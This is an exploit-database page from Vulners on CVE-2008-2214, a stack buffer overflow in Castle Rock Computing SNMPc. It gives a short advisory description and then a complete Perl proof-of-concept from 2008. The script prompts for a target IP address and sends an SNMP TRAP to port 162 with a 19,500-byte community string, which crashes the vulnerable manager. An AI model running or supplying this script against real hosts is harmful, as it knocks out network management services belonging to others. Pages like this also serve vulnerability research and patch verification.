Vulners
Lucene search
Castle Rock Computing SNMPc <= 7.0.19 - Community String Stack Based Buffer Overflow Vulnerability
| Reporter | Title | Published | Views | Family All 12 |
|---|---|---|---|---|
 | CVE-2008-2214 | 12 Nov 200800:00 | – | circl |
 | Preemptive Protection against Castle Rock Computing SNMPc Network Manager Community String Stack Vulnerability | 28 Jul 200800:00 | – | checkpoint_advisories |
| Castle Rock Computing SNMPc Network Manager Community String Buffer Overflow (CVE-2008-2214) | 15 Oct 200900:00 | – | checkpoint_advisories |
 | CVE-2008-2214 | 14 May 200818:00 | – | cve |
 | CVE-2008-2214 | 14 May 200818:00 | – | cvelist |
 | CVE-2008-2214 | 14 May 200818:20 | – | nvd |
 | Stack overflow | 14 May 200818:20 | – | prion |
 | SNMPc Network Manager SNMP TRAP community string buffer overflow | 21 Jul 200800:00 | – | saint |
| SNMPc Network Manager SNMP TRAP community string buffer overflow | 21 Jul 200800:00 | – | saint |
| SNMPc Network Manager SNMP TRAP community string buffer overflow | 21 Jul 200800:00 | – | saint |
10
source: http://www.securityfocus.com/bid/28990/info
Castle Rock Computing SNMPc is prone to a stack-based buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied input.
Attackers can leverage this issue to execute arbitrary code in the context of the application, which typically runs with LocalSystem privileges. Successful exploits will compromise affected computers. Failed attacks will likely cause denial-of-service conditions.
Versions prior to SNMPc 7.1.1 are vulnerable.
#!usr/bin/perl -w
################################################################################################################
# Stack-based buffer overflow in the Network Manager in Castle Rock Computing SNMPc 7.1 and
# earlier allows remote attackers to cause a denial of service (crash) or execute arbitrary code
# via a long community string in an SNMP TRAP packet.
#
# Refer:
# http://web.nvd.nist.gov/view/vuln/detail?execution=e3s1
# http://www.securityfocus.com/bid/28990/discuss
#
#
# To run this exploit on MS Windows replace "#!usr/bin/perl -w" with "#!Installation_path_for_perl -w"
# (say #!C:/Program Files/Perl/bin/perl -w)
#
# This was strictly written for educational purpose. Use it at your own risk.
# Author will not bare any responsibility for any damages watsoever.
#
# Author: Praveen Darshanam
# Email: praveen[underscore]recker[at]sify.com
# Date: 11th November, 2008
#
# NOTE: Thanks to all my colleagues at iPolicy
# For reliable security solutions please visit http://www.ipolicynetworks.com/
#
##################################################################################################################
use Net::SNMP;
printf("Enter the IP Adress of Vulnerable SNMP Manager ");
$host_vulnerable = <STDIN>;
$port = 162;
$community = "D" x 19500;
($session, $error) = Net::SNMP->session(
-hostname => $host_vulnerable,
-port => $port,
-community => $community, # v1/v2c
-maxmsgsize => 65535,
);
if (!defined($session))
{
printf("ERROR: %s.\n", $error);
exit 1;
}
$ipaddress = "172.16.16.4";
#Throwing an error without Agent so randomly assigned value to $ipaddress
$result = $session->trap(
-agentaddr => $ipaddress,
);
if (!defined($result))
{
printf("ERROR: %s.\n", $session->error);
$session->close;
exit 1;
}
$session->close;
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
11 Nov 2008 00:00Current
1.1Low risk
Vulners AI Score1.1
CVSS 210
EPSS0.18693